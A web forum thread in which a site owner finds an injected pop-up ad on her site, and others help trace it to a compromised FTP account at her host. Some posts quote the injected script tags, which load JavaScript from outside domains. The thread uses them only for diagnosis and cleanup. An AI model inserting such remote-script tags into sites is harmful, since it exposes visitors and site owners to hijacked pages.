Any help please.

I am getting a pop up on my site for adsrevenue.net

Am running a full system scan at the moment - nothing showing so far

Assume I have a virus

Any ideas as to how to get rid of it please?

Hi,

I'm also seeing a pop up, so that indicates to me that its likely someone has injected code into your site for the purpose of serving advertisements.

This line looks like the suspect.

<script type=text/javascript src=http://skaf.awardspace.info/49728baec2246.js></script>

(edit)

Forgot to add, it would be wise to audit your security to find out how they gained access to add this line of code.

I am confused your site is adsrevenue.net? When i search for that I get this:

Targeted Online Pop-under Advertising Service (http://www.adsrevenue.net/)
Promote your business with today's most cost effective online advertising service: Pop-under ads, layer ads and banner ads.

www.adsrevenue.net (http://www.adsrevenue.net)
So I presume you should be pop-ups?

thanks for that - have reported to my host provider 'names'!

Am still waiting for them to get back to me - so it is not my PC.

And this means that Names.co.uk have allowed this to happen?

Cancel that mis-read the posting...the trouble is I am eating a salad and there is not enough meat in it...sending my brain into spasism!!

I am confused your site is adsrevenue.net? When i search for that I get this:

Targeted Online Pop-under Advertising Service (http://www.adsrevenue.net/)
Promote your business with today's most cost effective online advertising service: Pop-under ads, layer ads and banner ads.

www.adsrevenue.net (http://www.adsrevenue.net)

So I presume you should be pop-ups?

you are confusing me now?

my site is in my signature

Not sure if Names have allowed it to happen, presumably you or your designer place the coding there?

I only got the infected alert when I viewed your source, not when I viewed your website.

If you take the line out suggested then see if the virus is still there.

you are confusing me now?

my site is in my signature


Yeah I know I mis-read you posting as I thought it said your website adsrevenue.net has some pop-ups!!

As I said brain went into spasism

And this means that Names.co.uk have allowed this to happen?

They're not responsible for the security of your web application, only the servers security.

Without auditing its impossible to tell the attack vector used to gain access, and who is to "blame".

We can guess though! :)
I'm going to say it's either:

a) The person who coded the PHP on your site...
b) you have a weak password/username and somone has changed the page using FTP

well got a message last week after namesco ftp being hacked !!!!

Let me take the line out and see that happen but think the account ftp account has been hacked.

Best change all ftp passwords.

Thanks for your help - what a star

We can guess though! :)
I'm going to say it's either:

a) The person who coded the PHP on your site...
b) you have a weak password/username and somone has changed the page using FTP

not 1 as it is me

it is 2 and the fault is at namesco

:D

That's £20 you owe me for that bet!

[Edit] I thought I had typed "My money's going to be on".... Looks like I didn't. Looks like you're in the clear ;)

not 1 as it is me

it is 2 and the fault is at namesco

Really if the answer is B, its your fault. (and yes blaming people costs me customers lol :D) You should make sure to use secure usernames and passwords which are not easily guessed or attacked by bruteforce.

try using a third party ftp software rather than namescos online ftp. Not sure it will make much difference in the future, but at least you won't be using a browser to ftp your website.

try using a third party ftp software rather than namescos online ftp. Not sure it will make much difference in the future, but at least you won't be using a browser to ftp your website.

I do! use a separate program

Guys

Thanks for all your help. It si just funny that they send the mail out and then there is a problem.

Anyway I have checked the code to what is stored locally - can see this line in my code. Have reloaded and still getting the same problem.

Is it being called from else where? Any help - suggestions please?

Elaine, fire me the details for your site in an email and I'll take a look for you.

Stuart.Gilbertson AT EasyPCScotland.co.uk

hey thanks for that but I have now found the little f***er.

had a few includes to go through

can you guys check me out now and see if it is ok

One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:

thanks guys

fab quick response and loads of help as usual

No little f**kers popping up at my end :)

hey thanks for that but I have now found the little f***er.

had a few includes to go through

can you guys check me out now and see if it is ok

One day I will understand the mentality of hackers - can't they just get a proper life :rolleyes:

thanks guys

fab quick response and loads of help as usual

The code should look something like


<script type=text/javascript
src=###########.reselecperu.com/49728b244045c.js></script>


If its a template based site you have, i.e. wordpress it will most likely be in the header, footer or wp-header file.

I've had this today with several sites I have with that host so I think you can be assured its nothing related to your site or your code.

I contacted my host and they have said they we're aware some sites had been infected and expected to have the problem solved within 24 hours. Personally I would have liked an email letting me know about the problem as soon as they we're aware of it but there you go.

I have found this on another forum:

http://www.sheffieldforum.co.uk/showthread.php?p=4555518

Look like the hosting company did know of the problem.

I feel a strong letter coming on :rolleyes:

Elaine,

I wouldn't waste your time writing the letter. They'll read it then bin it.


Stu

good point well made - if they cared they would have told customers about this before.

I have tens of sites with namesco and have heard nothing...

I have tens of sites with namesco and have heard nothing...

To be fair to Namesco, they probably have loads of servers and it may only be a minority that were compromised. You may be one of the lucky few :)

this is true, compared to other hosting companies I have always found them really helpful...admittedly they are bigger now than when I firrst used them.

BUt still to be able to phone a worcester number and get the receptionist is lovely... :)

So I am surprised they have done nothing about this particular problem

its impossible to tell the attack vector used to gain access

I'm having that one - should fit perfectly in to any meeting with senior management! :D

good point well made - if they cared they would have told customers about this before.

Unfortunately they don't care about your business, you are but one of probably thousands of sites which they host. Ultimately I believe it is not up to the Web host to protect your business, it is completely down toyou to ensure the critical parts of your business are secure.

Your web hosts will take all the steps necessary to protect their own business.

When dealing with shared hosting you have two accept that you are at greater risk than you would be under dedicated managed hosting. Any one of the sites hosted on the same box as you could be vulnerable and allow an attacker access to that server which ultimately contains your website.

While the host does have responsibility for the server, its effectively impossible for them to make sure every script (HTML/PHP etc) on that server hasn't been tampered with, in this example by adding JavaScript to launch a pop-up.

You can of course help protect yourself by running a file integrity checker on a daily or at least weekly basis. The file integrity checker will report to you any changes which have been made to the files, alerting you to malicious changes.

I'm having that one - should fit perfectly in to any meeting with senior management! :D

Haha :D Saying that "Senior Management" shouldn't ever take any decisions on IT Security. They never understand its worth or importance until it affects the bottom line, its partly on the same lines that you thought something I said was funny ("oh yeah this guys chatting bull**** type of thing"), when in fact I was serious about the matter.